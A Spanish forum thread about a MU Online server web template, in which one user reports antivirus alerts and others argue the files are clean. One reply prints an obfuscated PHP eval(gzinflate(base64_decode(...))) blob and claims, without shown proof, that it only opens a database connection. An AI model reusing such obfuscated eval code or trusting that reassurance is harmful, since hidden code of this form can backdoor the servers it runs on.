Solo usuarios registrados pueden comentar y agradecer, Logueate o Registrate

Autor Topic: Template MU Darlin.  (Visto 3355 veces)

0 Miembros and 1 Guest are viewing this topic.

Offline Lude on: April 12, 2017, 05:23:02 PM

  • C++ Coder
  • 0 puntos por ventas
  • *
  • Rank: Puto amo
  • Posts: 265
  • Gracias recibida: 5710
  • ec


INFORMACIÓN

Template Darlin, compatible con MU Core 1.6/1.8
DESCARGAS



CONTRASEÑA

"tuservermu.com.ve" sin comillas.

CREDITOS

LUCHOG
« Ultima edicion: April 12, 2017, 05:31:06 PM by Lude »

Offline master1986 #1 on: May 07, 2017, 01:13:41 PM

  • 0 puntos por ventas
  • *
  • Rank: Dedicado
  • Posts: 45
  • Gracias recibida: 9
  • cl
me salto en antivirus con varios archivos del template ojo muchachos

ojo Señor Super Moderador @Lude, @ZabiinoOo el Template esta con virus



« Ultima edicion: May 07, 2017, 01:30:37 PM by master1986 »

Gracias:


Offline ZabiinoOo #2 on: May 07, 2017, 01:55:11 PM

  • Administrador
  • 0 puntos por ventas
  • *
  • Rank: Puto amo
  • Posts: 5.323
  • Gracias recibida: 65017
  • pe
@master1986 lo descargue y analize con avast y no me salto ninguna advertencia, y los index que muestras los revise y no son mas que simples respaldos del index original, de todos modos aqui limpie el repack de backups innecesarios de los archivos y deje los originales prueba aver con este: https://mega.nz/#!KIYGDZiJ!DVZ1c_ha67nzMqkDbZzycw1iADB_JnxeZI2boa0WUOk yo no creo de alguna posibilidad de virus dentro de los archivos metidos intencionalmente porque confio muy bien en lude por lo tanto pienso no se debe culpar a lude, igual esperemos te funcione este que te acabo de dejar



Prohibido pedir soporte via MP
Leer las reglas de cada seccion

Offline master1986 #3 on: May 07, 2017, 03:15:21 PM

  • 0 puntos por ventas
  • *
  • Rank: Dedicado
  • Posts: 45
  • Gracias recibida: 9
  • cl
@ZabiinoOo gracias por la aclaracion, yo no dije que alla sido intencional,
hay veces que uno no se da cuenta de que tiene virus. solo ese fue el comentario
para que tubiera ojo en sus aportes.

saludos compadre.

Gracias:


Offline Piwi #4 on: May 07, 2017, 04:19:17 PM

  • 0 puntos por ventas
  • *
  • Rank: Principiante
  • Posts: 15
  • Gracias recibida: 17
  • ai
=) ese era mi template que mande a ripear. no tiene ningun virus . los index son modificacion tras modificacion.

Offline Pasa_Pal_Fondo #5 on: April 08, 2018, 01:30:56 PM

  • 0 puntos por ventas
  • *
  • Rank: Dedicado
  • Posts: 43
  • Gracias recibida: 546
=) ese era mi template que mande a ripear. no tiene ningun virus . los index son modificacion tras modificacion.
porque no podes mis creditos por ripear gato

Offline antony05 #6 on: April 08, 2018, 05:56:16 PM

  • 0 puntos por ventas
  • *
  • Rank: Principiante
  • Posts: 2
  • Gracias recibida: 0
  • am
Hola. Seguramente el antivirus te tomo como virus esta linea
Code: [Select]
<?php
eval(gzinflate(base64_decode('HVZHz8TGDT3Hv+K72YYAqzfEibHqvay6LoHqqvf+67P2gQA54MOQQ/Jx/vrvn39N1fQLCP7w61b8JEtW1cf4U6w/0zJuxafOx59pXH665Kcr7p+86L6yFFk1rl/lb6epLvIk/+nqrViSpU7++NGSn3r4FENdfM2vehTLmvztXfx9RTbm9Wf8Wf8BV3X6z/FSZ1vSF8NW/PFLcSTdb5+nHsou2Yrf0mQtCOx/efEFFr/9Kvmp9BxGwG3ooKZ4DrbMKxZ8rdd53t+BILVCwzZ9de/SAy+GJubFl8LXtmnaDJCXIHgcofdCwLGoLZMFPwre32xP0hxegdXclfZreMC+HCec6oFgeAGxyeH16t7qBID1AjIvyMb5AYCol+DqLd8+NNiYtpTX4ShbdRKiHgfhD8WfKKDGEmw6DzmAQ4m/5h4kx6FnYYUlRwG02hRRtN5HB2bpa4cpL7W9Bhu36C8Y4g8UD0HBweHZ84VZc9l7srBEz3rcdgHdUaYy4rVYDZD884ao5KyHe2bnMnBPKUhWyWbkuT7d0WThtY4qPFZNKvF2fanFVmI3TQRKXrYtEdf6AtYLlWqzKUewNTMvTWKe1BC8Z9tnIRmRDA17Lrw4XyLLpCl9TvfAQE1glkVxgdb71WPQs9IChJcdHh9hOwl28ZRD5XG9wdCTRE+XvasZ6BqnclhFuRlpLsSEh33tsJz4iUamUe2E5TKszgU0F74qoEfWMazLeCQRI2qJF1iiQipvlJq+4JK6DAU7rOhVIQBOvha3FLAun67pscgrGIJzQp0myT/rTp0X+w4uVsbpF7rSffUiOFHV6IvE4wE2nH3hSvTliTr18uFohIKptPBVIBn52RE+TJ+91pFUvNGjnXNrf5LI0UJTYDbTi7tB0sKwl5G3+cANFa4RwZ1PTp2JxJHfcpOri38IfzG3wRW1tleSc62FAqITMXJtSdrw6OEsXbimVCqFJEve+XF1KL3lmVCQ7P3oA29W/G5iRgw+buLH2fVQQV6O9mq9qTGoGMmKYlBTX2mbzmo8qvcwMgXFqeN9pmJD0vpFZzEBJyKiRIa50Em40J5Ywa9vOTMDJzMTXPq8eQ4MojBMP4tHWodRkG61dRAmslJih5JPz/noR+Y+ApxB47C0wTL3Ofc5uSK+sJJBItGcQ4HD27n3sHYAAGrAor5VmY50ww/yOl5SrhH0yxmfXNolIgn0UeJn+mrSYqjK4s6JBtmBjUgIXCVPVr+Lwq7XzXts8BPQvhSuabd0iv1UNAA3FqY3GuvhhDu5HpxgaTRaczHxgGo21/UIntp9pETLNkxpdN1ZMuAdg/pe9kBdKO+8BgzzPkXEfOco7iX1Rs6feBUkMTES9OjOqefJsVm4zzQYmvXliELDcLLNHlRdxQgQtKDUG5/h9tlwzduHwx7aAloDET8vuWfr+SsAr4FoHWcgpvk8HcyKcSJiEzB7ZAAeynsItGDJcbN1ijgVZ0oJU1gPhOO94nuLJ1UVnvCZ1E4TFWX78BGlAO3Lm97tRFonfdRqQQvXjEEayumFGC/U8SkqJfGQoPAYsH7vilMvzvGKQcwihGiIvkz1QHx+hbTDj01qD/QlptZbqs8tQ/xxqy8GKOpbnRuwsNHavAJN+44wbyuDSXdOi8EjZV1skyUGl93iYrjOxDN5ZNOtZkNTf+nBLXwT9h5fsOMYMcnqOlJyBrb5mpTbumXezKm+CjDa+jzJ29F8kx88GQKUAU+mEkPhWrfWsXMEjCOSUCpY+2FLdkfzratyyg9MHlGD9KV8llMkgyBGDwXAc1RDik6sfQNXwScnMlsxergLSA5wX8dio7s8GIxOWUDhgTTenuxnLyNCLDGlpjKLqOnNJUEXs3UZJfalxxQ29GSbAg3UJ+Wkhc0hPh7q4Sbc60foyYs79RFXZ1LaWXaHszwnK+rs0xV75W3SRhuHeMnUQutpyrTeBXQdeEkxtbIjqGEJYXzmhShZz+Dnfv+IYjaM3ZcGoBmWCEMYO7zMH3aT+TY9QnXb3wldSXBl2RpcbNeESfWVTkjXTsb5mnqX2Z2wqgyaU06bjRKpZ3i+75EUyVlpafh4T1AfPd+8M/NrcEmcarzF1wlpYnx3ShnFwlvoCntzarF/V6gK99KQxW/roxhRSS69A/eqf2PXiN565Hknvqhq06NMNcRG8hxz/amGOx0lNM7kNzPGVAfx66hi/RbLOubJ70wFOJ+IjuKmPtlK8IXLlgycgs7oEl1L61a07bVzrVbx7pZrvC/04WH4bV+kczOcss7ywsw5xQ+Qqzfr5EoKfrAOnZoBHtHNRDrrTNZAqKVDYwLUCZqPHBlgTlbQmq/Lq83723SnyW1kZqyAvlrrNCIhbcHIhR/R8dVwPY3IiQGsxYX65SJOjVUAMrGejjHfHCAQgiGxlhJUg269CbqrnfsmXoQ4FUMHah/P3WaDBzLi3Y4cHlSKAFdDSrymJd+vyfSPyURN5NuXJfyZdGg6PtGR855G79ZbpPhq37amoXBkuYVD1JV3w+GMtY946HeA6m9yA9/D2V3GNxqjl+c2LL6b2mr7AAQwcmV8jrZEfRKKeLJJ6NgDL24r/3mIzyRJBlWsWv59C/ZNc5G3TIJ4/j12hNJGaC0N8mZRkglxiDT6EZpkD1EqFCqYERe6BAnVfSraYH5pFwKljHRRrbuyBTrorHm4KP/trFKnR8jP9fKTsKDQAAQAvPGsLHgZ0wsE6mLcuTkYC0q4b6wz7B3r0nJj4dhOt28XcK4z3hiomK4VUJvb35DBRRJNWeyW1zwinytgywlLZgwNms+IPk7TJV/OhD291CmSVVPqutTmKYMifi6MG86nkX7jFTurS2bTvwNZdutlwoXvxkRgKI7HYnnD1Og/KaRAB0FYkaauZkjHS9tnyWlWwjcPziZLbPI0j7rwckHNKjLmQR3MZp8pz8fFO+Hy0BHsahzerw3qL0GPsDL7/imbxiJBmi6hATyj//z6+++///uXv/77y7/+/Ov/')));
?>
Lo estuve revisando y solo trae esto asi que no hay drama.
Code: [Select]
<?php 
include ("engine/connect_core.php");
require_once("Config/config.php");
?><?
if($RafaMaster['db_port'] != 1433)
{
$connection=$RafaMaster['db_host'].$RafaMaster['separator'].$RafaMaster['db_port'];
}
else
{
$connection=$RafaMaster['db_host'];
}
$cnn=@mssql_connect($connection,$RafaMaster['db_user'],$Repiola['express_security']) or die('<center><span class="Estilo2">'.right_message_2.'</span></center>');
$db=@mssql_select_db($RafaMaster['db_name'],$cnn) or die('<center><span class="Estilo2">'.right_message_3.'</span></center>');
$db=@mssql_select_db($RafaMaster['db2_name'],$cnn) or die('<center><span class="Estilo2">'.right_message_3.'</span></center>');
?>

Solo usuarios registrados pueden comentar y agradecer, Logueate o Registrate

 

Related Topics

  Subject / Started by Replies Last post
18 Replies
2843 Views
Last post May 23, 2018, 02:54:21 PM
by Cloud
3 Replies
1154 Views
Last post July 11, 2019, 02:04:59 PM
by Stefano.Aguiar
10 Replies
1550 Views
Last post November 20, 2018, 10:01:15 PM
by yelson
0 Replies
171 Views
Last post March 08, 2019, 01:01:40 PM
by adryan
5 Replies
502 Views
Last post October 24, 2019, 02:25:00 AM
by Terran